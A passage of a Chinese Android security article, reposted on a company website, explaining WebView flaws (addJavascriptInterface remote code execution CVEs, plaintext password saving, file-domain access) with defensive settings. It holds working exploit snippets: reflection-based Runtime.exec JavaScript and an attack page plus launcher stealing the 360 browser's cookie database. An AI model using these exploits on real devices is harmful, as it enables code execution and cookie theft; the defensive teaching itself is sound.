Android安全开发之WebView中的地雷

1.About WebView

成都创新互联公司主要从事网站设计、网站制作、网页设计、企业做网站、公司建网站等业务。立足成都服务安阳县,10余年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:13518219792

在Android开发中,经常会使用WebView来实现WEB页面的展示,在Activiry中启动自己的浏览器,或者简单的展示一些在线内容等。WebView功能强大,应用广泛,但它是天使与恶魔的合体,一方面它增强了APP的上网体验,让APP功能更多样化,另一方面它也引入了很多的安全问题。在过去几年WebView中被披露的重大漏洞包括了任意代码执行漏洞、跨域、密码明文保存等,这些安全问题可以直接导致用户敏感信息泄露,移动终端被恶意攻击者控制。下文将详细介绍这一系列安全问题,罗列相关的一些案列,并提供相应安全开发建议。

2.WebView任意代码执行漏洞

已知的WebView任意代码执行漏洞有4个。较早被公布是CVE-2012-6636,揭露了WebView中addJavascriptInterface接口会引起远程代码执行漏洞。接着是CVE-2013-4710,针对某些特定机型会存在addJavascriptInterface API引起的远程代码执行漏洞。之后是CVE-2014-1939爆出WebView中内置导出的“searchBoxJavaBridge_”Java Object可能被利用,实现远程任意代码。再后来是CVE-2014-7224,类似于CVE-2014-1939,WebView内置导出“accessibility”和“accessibilityTraversal”两个Java Object接口,可被利用实现远程任意代码执行。

后文我们将围绕下面这段常见的示例代码展开:

 
 
 
 
    
  
  
  
  
  1. WebView mWebView = (WebView)findViewById(R.id.webView);  
    2.   
  
  
  
  2. ①WebSettings msetting = mWebView.getSettings();  
    3.   
  
  
  
  3. ②msetting.setJavaScriptEnabled(true);  
    4.   
  
  
  
  4. ③mWebView.addJavascriptInterface(new TestAddJsInterface(), "myjs");  
    5.   
  
  
  
  5. ④mWebView.loadUrl(getIntent().getStringExtra("url")); 
    6.

CVE-2012-6636

Android系统为了方便APP中Java代码和网页中的Javascript脚本交互,在WebView控件中实现了addJavascriptInterface接口,对应示例代码中的③,网页中的JS脚本可以利用接口“myjs”调用App中的Java代码,而Java对象继承关系会导致很多Public的函数及getClass函数都可以在JS中被访问,结合Java的反射机制,攻击者还可以获得系统类的函数,进而可以进行任意代码执行。漏洞在2013年8月被披露后,很多APP都中招,其中浏览器APP成为重灾区。但截至目前任有很多APP中依然存在此漏洞,与以往不同的只是攻击入口发生了一定的变化。另外我们也发现一些小厂商的APP开发团队因为缺乏安全意识,依然还在APP中随心所欲的使用addjs接口,明目张胆踩雷。

出于安全考虑,Google在API 17中规定允许被调用的函数必须以@JavascriptInterface进行注解,理论上如果APP依赖的API为17或者以上,就不会受该问题的影响。但部分机型上,API 17依然受影响,并且如果APP存在此漏洞,且targetsdk小于17,那漏洞的影响可以覆盖到android4.4的终端,如果大于等于17,只能在android4.2的机型上触发,所以前一种情况的危害目前来看依旧很大。

CVE-2014-1939

在2014年发现在Android4.4以下的系统中,webkit中默认内置了“searchBoxJavaBridge_”, 代码位于“java/android/webkit/BrowserFrame.java”,该接口同样存在远程代码执行的威胁。

CVE-2014-7224

在2014年,研究人员Daoyuan Wu和Rocky Chang发现,当系统辅助功能服务被开启时,在Android4.4以下的系统中,由系统提供的WebView组件都默认导出"accessibility" 和"accessibilityTraversal"这两个接口,代码位于“android/webkit/AccessibilityInjector.java”,这两个接口同样存在远程任意代码执行的威胁。

常见挂马页面

 
 
 
 
    
  
  
  
  
  1. function addJsHack(cmdArgs){ 
    2.   
  
  
  
  2. for (var obj in window) 
    3.   
  
  
  
  3. { try { 
    4.   
  
  
  
  4. if ("getClass" in window[obj]) { 
    5.   
  
  
  
  5. try{ 
    6.   
  
  
  
  6. window[obj].getClass().forName("java.lang.Runtime"). 
    7.   
  
  
  
  7. getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);; 
    8.   
  
  
  
  8. }catch(e){ 
    9.   
  
  
  
  9. }  
    10.   
  
  
  
    11.   
  
  
  
  11. } catch(e) { 
    12.   
  
  
  
    13.   
  
  
  
    14.   
  
  
  
    15.   
  
  
  
  15. addJsHack() 
    16.

扫码攻击

图片来自于某漏洞收集平台,通过二维码扫描触发WebView任意代码执行漏洞:

以聚美优品为例Ver 3.305,APK MD5:DD8B00EDA393526F66D25CA16E8C7B5C,相关代码位于com.jm.android.jumei.controls.JuMeiCustomWebView.java中:

 
 
 
 
    
  
  
  
  
  1. public void initWebView(Activity activity, String str, LinearLayout linearLayout, IWebViewNotify iWebViewNotify) { 
    2.   
  
  
  
  2. ...... 
    3.   
  
  
  
  3. this.wapView.addJavascriptInterface(new WebAppJSInterface(), WEBVIEW_JS_INTERFACE_NAME); 
    4.   
  
  
  
    5.

3.WebView密码明文存储漏洞

WebView默认开启密码保存功能mWebView.setSavePassword(true),如果该功能未关闭,在用户输入密码时,会弹出提示框,询问用户是否保存密码,如果选择"是",密码会被明文保到/data/data/com.package.name/databases/webview.db

4.WebView域控制不严格漏洞

setAllowFileAccess

Android中默认mWebView.setAllowFileAccess(true),在File域下,能够执行任意的JavaScript代码,同源策略跨域访问能够对私有目录文件进行访问等。APP对嵌入的WebView未对file:/// 形式的URL做限制,会导致隐私信息泄露,针对IM类软件会导致聊天信息、联系人等等重要信息泄露,针对浏览器类软件,则更多的是cookie信息泄露。

setAllowFileAccessFromFileURLs

在JELLY_BEAN以前的版本默认是setAllowFileAccessFromFileURLs(true),允许通过file域url中的Javascript读取其他本地文件,在JELLY_BEAN及以后的版本中默认已被是禁止。

setAllowUniversalAccessFromFileURLs

在JELLY_BEAN以前的版本默认是setAllowUniversalAccessFromFileURLs(true),允许通过file域url中的Javascript访问其他的源,包括其他的本地文件和http,https源的数据。在JELLY_BEAN及以后的版本中默认已被禁止。

360手机浏览器缺陷可导致用户敏感数据泄漏

以360手机浏览器4.8版本为例,由于未对file域做安全限制,恶意APP调用360浏览器加载本地的攻击页面(比如恶意APP释放到SDCARD上的一个HTML)后,就可以获取360手机浏览器下的所有私有数据,包括webviewCookiesChromium.db下的cookie内容,攻击页面关键代码:

 
 
 
 
    
  
  
  
  
  1. function getDatabase() { 
    2.   
  
  
  
  2. var request = false; 
    3.   
  
  
  
  3. if(window.XMLHttpRequest) { 
    4.   
  
  
  
  4. request = new XMLHttpRequest(); 
    5.   
  
  
  
  5. if(request.overrideMimeType) { 
    6.   
  
  
  
  6. request.overrideMimeType('text/xml');} 
    7.   
  
  
  
    8.   
  
  
  
  8. xmlhttp = request; 
    9.   
  
  
  
  9. var prefix = "file:////data/data/com.qihoo.browser/databases"; 
    10.   
  
  
  
  10. var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db 
    11.   
  
  
  
  11. var path = prefix.concat(postfix); 
    12.   
  
  
  
  12. // 获取本地文件代码 
    13.   
  
  
  
  13. xmlhttp.open("GET", path, false); 
    14.   
  
  
  
  14. xmlhttp.send(null); 
    15.   
  
  
  
  15. var ret = xmlhttp.responseText; 
    16.   
  
  
  
  16. return ret; 
    17.   
  
  
  
    18.

漏洞利用代码:

 
 
 
 
    
  
  
  
  
  1. copyFile(); //自定义函数,释放filehehe.html到sd卡上 
    2.   
  
  
  
  2. String url = "file:///mnt/sdcard/filehehe.html"; 
    3.   
  
  
  
  3. Intent contIntent = new Intent(); 
    4.   
  
  
  
  4. contIntent.setAction("android.intent.action.VIEW"); 
    5.   
  
  
  
  5. contIntent.setData(Uri.parse(url)); 
    6.   
  
  
  
  6. Intent intent = new Intent(); 
    7.   
  
  
  
  7. intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity"); 
    8.   
  
  
  
  8. intent.setAction("android.intent.action.VIEW"); 
    9.   
  
  
  
  9. intent.setData(Uri.parse(url)); 
    10.   
  
  
  
  10. this.startActivity(intent); 
    11.

5.WebView file跨域漏洞

Android 2.3 webkit或者浏览器APP自建内核中会存在此类跨域漏洞。在处理转跳时存在漏洞,导致允许从http域跨向file域,实现跨域漏洞。以某浏览器4.5.0.511版本为例,写一个html,命名为filereach.html,存放在服务器上。该浏览器4.5.0.511的X5内核存在http域跨file域的漏洞。POC代码如下所示:

 
 
 
 
    
  
  
  
  
  1.  
    2.   
  
  
  
  2.  
    3.

在浏览器中打开服务器上的filereach.html,将从http域跳转到file域

6.安全开发建议

1)使用腾讯御安全类漏洞扫描工具进行基础开发漏洞检测定位;

2)建议开发者通过以下方式移除该JavaScript接口:

 
 
 
 
    
  
  
  
  
  1. removeJavascriptInterface("searchBoxJavaBridge_") 
    2.   
  
  
  
  2. removeJavascriptInterface("accessibility"); 
    3.   
  
  
  
  3. removeJavascriptInterface("accessibilityTraversal") 
    4.

3)出于安全考虑,为了防止Java层的函数被随便调用,Google在4.2版本之后,规定允许被调用的函数必须以@JavascriptInterface进行注解

4)通过WebSettings.setSavePassword(false)关闭密码保存提醒功能

5)通过以下设置,防止越权访问,跨域等安全问题:

setAllowFileAccess(false)

setAllowFileAccessFromFileURLs(false)

setAllowUniversalAccessFromFileURLs(false)

7.参考信息

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6636

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4710

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1939

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7224

http://drops.wooyun.org/webview.html

分享题目:Android安全开发之WebView中的地雷
分享链接:http://www.shufengxianlan.com/qtweb/news2/129302.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

网站收录知识

分类信息网站

鸿艺文化    成都网站优化    中国电信西部信息中心机房    中国电信成都枢纽中心    app软件开发公司    高防机房    网站搜索引擎优化    成都网站推广公司    添翼二手车鉴定    成都网站建设    网络推广公司    小程序    网站建设    成都橡塑保温管    H5网站制作    温江服务器托管    保温橡塑管    顺泽窗帘    成都做网站    绵阳机房托管